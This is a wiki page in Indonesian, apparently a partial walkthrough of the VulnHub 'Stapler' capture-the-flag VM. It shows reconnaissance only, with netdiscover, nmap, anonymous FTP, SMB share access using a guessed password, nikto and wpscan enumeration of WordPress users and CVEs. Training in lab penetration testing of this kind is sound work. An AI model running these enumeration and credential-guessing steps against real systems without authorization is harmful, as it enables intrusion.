Difference between revisions of "CTF Stapler: Walkthrough"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 461: | Line 461: | ||
Yang menarik, kita memperoleh 4 directory: /phpmyadin/, /blogblog/, /admin112233/, dan tentunya /robots.txt. | Yang menarik, kita memperoleh 4 directory: /phpmyadin/, /blogblog/, /admin112233/, dan tentunya /robots.txt. | ||
| − | + | ==Akses Web== | |
| + | |||
| + | Coba akses, | ||
| + | |||
| + | https://192.168.0.61:12380/robots.txt | ||
| + | |||
| + | Tampak isinya, | ||
User-agent: * | User-agent: * | ||
| Line 467: | Line 473: | ||
Disallow: /blogblog/ | Disallow: /blogblog/ | ||
| − | + | Mari kita coba | |
| + | |||
| + | https://192.168.0.61:12380/admin112233/ | ||
| + | |||
| + | Akan mengeluarkan "humor" | ||
| + | This could of been a BeEF-XSS hook ;) | ||
| + | Mari kita coba | ||
| − | + | https://192.168.0.61:12380/blogblog/ | |
| − | + | Tampak berisi blog, tidak ada yang terlalu menarik kecuali ada beberapa nama. Dan yang menarik ada login page. | |
| + | ==WPScan== | ||
| + | Scan menggunakan, | ||
| − | + | wpscan --url https://192.168.0.61:12380/blogblog/ --enumerate | |
| − | + | Hasilnya, | |
_______________________________________________________________ | _______________________________________________________________ | ||
__ _______ _____ | __ _______ _____ | ||
Revision as of 15:04, 23 January 2023
Description
+---------------------------------------------------------+ | | | __..--\ | | __..-- \ | | __..-- __..-- | | __..-- __..-- | | | \ o __..--____....----"" | | \__..--\ | | | \ | | +----------------------------------+ | | +----------------------------------+ | | | +- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+ | Name: Stapler | IP: DHCP | | Date: 2016-June-08 | Goal: Get Root! | | Author: g0tmi1k | Difficultly: ??? ;) | +- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+ | | | + Average beginner/intermediate VM, only a few twists | | + May find it easy/hard (depends on YOUR background) | | + ...also which way you attack the box | | | | + It SHOULD work on both VMware and Virtualbox | | + REBOOT the VM if you CHANGE network modes | | + Fusion users, you'll need to retry when importing | | | | + There are multiple methods to-do this machine | | + At least two (2) paths to get a limited shell | | + At least three (3) ways to get a root access | | | | + Made for BsidesLondon 2016 | | + Slides: https://download.vulnhub.com/media/stapler/ | | | | + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman | | + ...and shout-outs to the VulnHub-CTF Team =) | | | +- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+ | | | --~~Enjoy. Have fun. Happy Hacking.~~-- | | | +---------------------------------------------------------+
Instalasi
- Download OVA
- Install di VirtualBox
- Jalankan==
Hack
netdiscover
Cek IP address server Stapler
netdiscover -r 192.168.0.0/24
hasilnya
Currently scanning: Finished! | Screen View: Unique Hosts
29 Captured ARP Req/Rep packets, from 21 hosts. Total size: 1740
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.2 40:16:7e:22:e7:69 1 60 ASUSTek COMPUTER INC.
192.168.0.4 10:6f:3f:3d:73:d0 1 60 BUFFALO.INC
192.168.0.7 4c:e6:76:1f:15:4b 1 60 BUFFALO.INC
192.168.0.9 10:6f:3f:17:94:94 1 60 BUFFALO.INC
192.168.0.7 4c:e6:76:1f:15:4c 1 60 BUFFALO.INC
192.168.0.61 08:00:27:8b:94:43 1 60 PCS Systemtechnik GmbH
192.168.0.60 74:d0:2b:6a:a9:66 1 60 ASUSTek COMPUTER INC.
192.168.0.101 08:60:6e:db:4e:b8 1 60 ASUSTek COMPUTER INC.
192.168.0.141 b0:a7:b9:b6:c1:c9 3 180 TP-Link Corporation Limited
192.168.0.102 6c:29:90:1e:89:7f 1 60 WiZ Connected Lighting Company Limited
192.168.0.145 c0:56:27:1c:be:e1 1 60 Belkin International Inc.
192.168.0.169 4c:e6:76:1f:15:4b 1 60 BUFFALO.INC
192.168.0.170 4c:e6:76:1f:15:4b 1 60 BUFFALO.INC
192.168.0.169 4c:e6:76:1f:15:4c 1 60 BUFFALO.INC
192.168.0.170 4c:e6:76:1f:15:4c 1 60 BUFFALO.INC
192.168.0.199 b4:b0:24:3d:8b:3b 1 60 TP-Link Corporation Limited
192.168.0.223 c0:56:27:67:0d:a3 1 60 Belkin International Inc.
192.168.0.224 28:ff:3e:5c:10:32 4 240 zte corporation
192.168.0.222 6c:16:32:63:52:21 4 240 HUAWEI TECHNOLOGIES CO.,LTD
192.168.0.144 6e:65:e5:8a:25:0d 1 60 Unknown vendor
0.0.0.0 b0:a7:b9:b6:c1:c9 1 60 TP-Link Corporation Limited
Target di VirtualBox biasanya MAC 08:00:.....
IP address target disini adalah
192.168.0.61 08:00:27:8b:94:43 1 60 PCS Systemtechnik GmbH
Port Scanning
Port scanning
nmap -sS -A -O -n -p1-60000 192.168.0.61 nmap -v -A 192.168.0.61
Hasilnya kira-kira,
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 01:11 EST Initiating SYN Stealth Scan at 01:11 Scanning 192.168.0.61 [1000 ports] Discovered open port 21/tcp on 192.168.0.61 Discovered open port 139/tcp on 192.168.0.61 Discovered open port 3306/tcp on 192.168.0.61 Discovered open port 80/tcp on 192.168.0.61 Discovered open port 53/tcp on 192.168.0.61 Discovered open port 22/tcp on 192.168.0.61 Discovered open port 666/tcp on 192.168.0.61 Scanning 7 services on 192.168.0.61 Nmap scan report for 192.168.0.61 Host is up (0.00066s latency). Not shown: 992 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.0.62 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 550 Permission denied. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) | 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) |_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519) 53/tcp open domain dnsmasq 2.75 | dns-nsid: | NSID: 218m83 (3231386d3833) | id.server: CGK |_ bind.version: dnsmasq-2.75 80/tcp open http PHP cli server 5.5 or later |_http-title: 404 Not Found | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS 139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) 666/tcp open doom? | fingerprint-strings: | NULL: | message2.jpgUT | QWux | "DL[E | #;3[ | \xf6 | u([r | qYQq | Y_?n2 | 3&M~{ | 9-a)T | L}AJ |_ .npy.9 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 | mysql-info: | Protocol: 10 | Version: 5.7.12-0ubuntu1 | Thread ID: 10 | Capabilities flags: 63487 | Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, FoundRows, SupportsLoadDataLocal, InteractiveClient, SupportsTransactions, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, LongPassword, ODBCClient, ConnectWithDatabase, SupportsCompression, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments | Status: Autocommit | Salt: <Xp\x1EH]w*\x1C"+\x14\x19\x16*\x15ZnR\x1D |_ Auth Plugin Name: mysql_native_password MAC Address: 08:00:27:8B:94:43 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess: 0.005 days (since Mon Jan 23 01:04:14 2023) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s | smb2-time: | date: 2023-01-23T13:11:23 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | RED<00> Flags: <unique><active> | RED<03> Flags: <unique><active> | RED<20> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> |_ WORKGROUP<1e> Flags: <group><active> | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | Computer name: red | NetBIOS computer name: RED\x00 | Domain name: \x00 | FQDN: red |_ System time: 2023-01-23T13:11:23+00:00 TRACEROUTE HOP RTT ADDRESS 1 0.66 ms 192.168.0.61 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 49.02 seconds Raw packets sent: 2024 (90.564KB) | Rcvd: 24 (1.428KB)
Salah satu yang menarik disini adalah FTP, dengan anonymous FTP login.
Anonymous FTP
Coba login anonymous ftp (username anonymous password bebas merdeka)
ftp 192.168.0.61 Connected to 192.168.0.61. 220- 220-|----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|----------------------------------------------------------------------------------------| 220- 220 Name (192.168.0.61:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>
Keren! cek ada file apa saja di FTP server tersebut dan ambil file yang ada :) ..
ftp> ls 550 Permission denied. 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp> get note local: note remote: note 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 100% |*************************************************************************************************************************************************************************************| 107 0.91 KiB/s 00:00 ETA 226 Transfer complete. 107 bytes received in 00:00 (0.91 KiB/s) ftp> quit 221 Goodbye.
Buka note
cat note
Isinya,
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Tidak ada yang terlalu menarik,tapi ada dua (2) nama :) ... mungkin bisa membantu nanti jika kita butuh bruteforce.
Coba SSH root
Coba akses.
ssh root@192.168.0.61
Hasilnya gagal,
The authenticity of host '192.168.0.61 (192.168.0.61)' can't be established. ED25519 key fingerprint is SHA256:eKqLSFHjJECXJ3AvqDaqSI9kP+EbRmhDaNZGyOrlZ2A. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.0.61' (ED25519) to the list of known hosts. ----------------------------------------------------------------- ~ Barry, don't forget to put a message here ~ ----------------------------------------------------------------- root@192.168.0.61's password: Permission denied, please try again.
Tapi kita dapat satu nama lagi :) ..
Coba SMB
Coba,
smbclient -L 192.168.0.61 Password for [WORKGROUP\root]:
Coba isi password dengan root. Untung2-an berhasil :) .. Hasilnya kira-kira
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SCANDISK
Tampaknya ada 2 active share - kathy dan tmp.
Yang menarik ada komentar - Fred, What are we doing here?
Tampaknya Fred bisa mengakses kathy share.
Mari kita akses kathy share menggunakan networked user/computer fred.
smbclient //fred/kathy -I 192.168.0.61 -N
Coba check ls
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 3 12:52:52 2016
.. D 0 Mon Jun 6 17:39:56 2016
kathy_stuff D 0 Sun Jun 5 11:02:27 2016
backup D 0 Sun Jun 5 11:04:14 2016
19478204 blocks of size 1024. 16397108 blocks available
smb: \>
Keren! tampaknya kita bisa tersambung. Lakukan enumerate file dan folder.
smb: \> cd kathy_stuff\
smb: \kathy_stuff\> ls
. D 0 Sun Jun 5 11:02:27 2016
.. D 0 Fri Jun 3 12:52:52 2016
todo-list.txt N 64 Sun Jun 5 11:02:27 2016
19478204 blocks of size 1024. 16397108 blocks available
smb: \kathy_stuff\> get todo-list.txt
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (3.3 KiloBytes/sec)
(average 3.3 KiloBytes/sec)
smb: \kathy_stuff\> cd ..
smb: \> cd backup\
smb: \backup\> ls
. D 0 Sun Jun 5 11:04:14 2016
.. D 0 Fri Jun 3 12:52:52 2016
vsftpd.conf N 5961 Sun Jun 5 11:03:45 2016
wordpress-4.tar.gz N 6321767 Mon Apr 27 13:14:46 2015
19478204 blocks of size 1024. 16397108 blocks available smb: \backup\> get vsftpd.conf getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (306.4 KiloBytes/sec) (average 154.8 KiloBytes/sec) smb: \backup\> quit
Setelah kita selesai dengan kathy share, kita bisa lakukan hal yang sama untuk tmp share,
smbclient //fred/tmp -I 192.168.0.61 -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jun 7 04:08:39 2016
.. D 0 Mon Jun 6 17:39:56 2016
ls N 274 Sun Jun 5 11:32:58 2016
19478204 blocks of size 1024. 16397096 blocks available
smb: \> quit
Tampaknya tidak ada yang menarik, paling tidak kita dapat file konfigurasi FTP, dan to-do-list.
Coba kita lihat,
cat todo-list.txt
isinya,
I'm making sure to backup anything important for Initech, Kathy
Coba kita lihat,
cat ls
isinya,
.: total 12.0K drwxrwxrwt 2 root root 4.0K Jun 5 16:32 . drwxr-xr-x 16 root root 4.0K Jun 3 22:06 .. -rw-r--r-- 1 root root 0 Jun 5 16:32 ls drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
Nikto 12380
Cek web
nikto -h 192.168.0.61:12380
Hasilnya,
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.0.61
+ Target Hostname: 192.168.0.61
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are
you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put
here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are
you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put
here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2023-01-23 01:55:17 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34
is the EOL for the 2.x branch.
+ Hostname '192.168.0.61' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-01-23 01:59:01 (GMT-5) (224 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Yang menarik, kita memperoleh 4 directory: /phpmyadin/, /blogblog/, /admin112233/, dan tentunya /robots.txt.
Akses Web
Coba akses,
https://192.168.0.61:12380/robots.txt
Tampak isinya,
User-agent: * Disallow: /admin112233/ Disallow: /blogblog/
Mari kita coba
https://192.168.0.61:12380/admin112233/
Akan mengeluarkan "humor"
This could of been a BeEF-XSS hook ;)
Mari kita coba
https://192.168.0.61:12380/blogblog/
Tampak berisi blog, tidak ada yang terlalu menarik kecuali ada beberapa nama. Dan yang menarik ada login page.
WPScan
Scan menggunakan,
wpscan --url https://192.168.0.61:12380/blogblog/ --enumerate
Hasilnya,
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.1.13:12380/blogblog/
[+] Started: Tue Oct 4 20:09:24 2016
[!] The WordPress 'https://192.168.1.13:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.1.13:12380/blogblog/wp-login.php?action=register [+] XML-RPC Interface available under: https://192.168.1.13:12380/blogblog/xmlrpc.php [!] Upload directory has directory listing enabled: https://192.168.1.13:12380/blogblog/wp-content/uploads/ [!] Includes directory has directory listing enabled: https://192.168.1.13:12380/blogblog/wp-includes/
[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27) [!] 23 vulnerabilities identified from the version number
[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7979 Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111 Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/ Reference: https://twitter.com/klikkioy/status/624264122570526720 Reference: https://klikki.fi/adv/wordpress3.html Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126 Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130 Reference: https://core.trac.wordpress.org/changeset/33536 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131 Reference: https://core.trac.wordpress.org/changeset/33529 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132 Reference: https://core.trac.wordpress.org/changeset/33541 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133 Reference: https://core.trac.wordpress.org/changeset/33549 Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186 Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/ Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/ Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187 Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/ Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188 Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/ Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/ Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5
[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358 Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/ Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6
[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376 Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/ Reference: https://core.trac.wordpress.org/changeset/36435 Reference: https://hackerone.com/reports/110801 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7
[!] Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377 Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/ Reference: https://core.trac.wordpress.org/changeset/36444 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7
[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
Reference: https://wpvulndb.com/vulnerabilities/8473 Reference: https://codex.wordpress.org/Version_4.5 Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
Reference: https://wpvulndb.com/vulnerabilities/8474 Reference: https://codex.wordpress.org/Version_4.5 Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
Reference: https://wpvulndb.com/vulnerabilities/8475 Reference: https://codex.wordpress.org/Version_4.5 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
[i] Fixed in: 4.5
[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8488 Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/ Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36 Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2
[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Reference: https://wpvulndb.com/vulnerabilities/8489 Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/ Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8 Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e Reference: http://avlidienbrunn.com/wp_some_loader.php Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518 Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/ Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.2.9
[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519 Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/ Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1 Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520 Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/ Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615 Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/ Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0 Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html Reference: http://seclists.org/fulldisclosure/2016/Sep/6 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616 Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/ Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.2.10
[+] WordPress theme in use: bhost - v1.2.9
[+] Name: bhost - v1.2.9
| Location: https://192.168.1.13:12380/blogblog/wp-content/themes/bhost/ | Readme: https://192.168.1.13:12380/blogblog/wp-content/themes/bhost/readme.txt
[!] The version is out of date, the latest version is 1.3.3
| Style URL: https://192.168.1.13:12380/blogblog/wp-content/themes/bhost/style.css | Theme Name: BHost | Theme URI: Author: Masum Billah | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the... | Author: Masum Billah | Author URI: http://getmasum.net/
[+] Enumerating usernames ... [+] Identified the following 10 user/s:
+----+---------+-----------------+ | Id | Login | Name | +----+---------+-----------------+ | 1 | john | John Smith | | 2 | elly | Elly Jones | | 3 | peter | Peter Parker | | 4 | barry | Barry Atkins | | 5 | heather | Heather Neville | | 6 | garry | garry | | 7 | harry | harry | | 8 | scott | scott | | 9 | kathy | kathy | | 10 | tim | tim | +----+---------+-----------------+
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Enumerating all plugins (may take a while and use a lot of system resources) ...
Time: 00:06:11 <=====================> (62804 / 62804) 100.00% Time: 00:06:11
[+] We found 4 plugins:
[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
| Latest version: 1.0 (up to date) | Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/ | Readme: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
[+] Name: akismet
| Latest version: 3.2 | Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215 Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/ Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5
